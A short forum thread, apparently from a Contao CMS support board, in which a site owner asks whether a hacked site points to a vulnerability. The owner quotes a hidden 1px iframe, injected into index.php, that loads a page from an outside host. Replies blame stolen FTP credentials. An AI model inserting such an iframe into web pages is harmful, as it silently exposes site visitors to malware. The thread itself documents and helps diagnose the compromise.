Could this be a vulnarability?
Having updated my website from 2.10 to 2.11.11, i relaxed knowing evething was ok. However my client has reported that there is a malware warning when one tries to access the website. after inspecting the website scripts to identify the source, i realised that this line
Code:
<iframe width="1px" height="1px" src=" http://noveltyship.com:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
had been inserted just after line.
This is what i got.
Code:
/**
* Instantiate the controller
*/
$objIndex = new Index();
$objIndex->run();
<iframe width="1px" height="1px" src=" http://noveltyship.com:7891/preferences/button.php?licenses=157" style="display:block;" ></iframe>
?>
Could this be a vulnerability? Kindly attend to this
Re: Could this be a vulnarability?
This looks definitely not correct and is not in the Contao-core as far as I know. I suppose that your webserver got hacked.
Re: Could this be a vulnarability?
check also that your pc (or the pc of the customer if he has ftp upload access) is infected
there is a malware that stole the credentials from every ftp connection and put its code into all .php and .html files
Re: Could this be a vulnarability?
Thanks for the replies. I noticed that client server was hacked into and true the ftp details had been stolen. It has since been restored. Contao rocks. I love it. Already introducing others here in Kenya.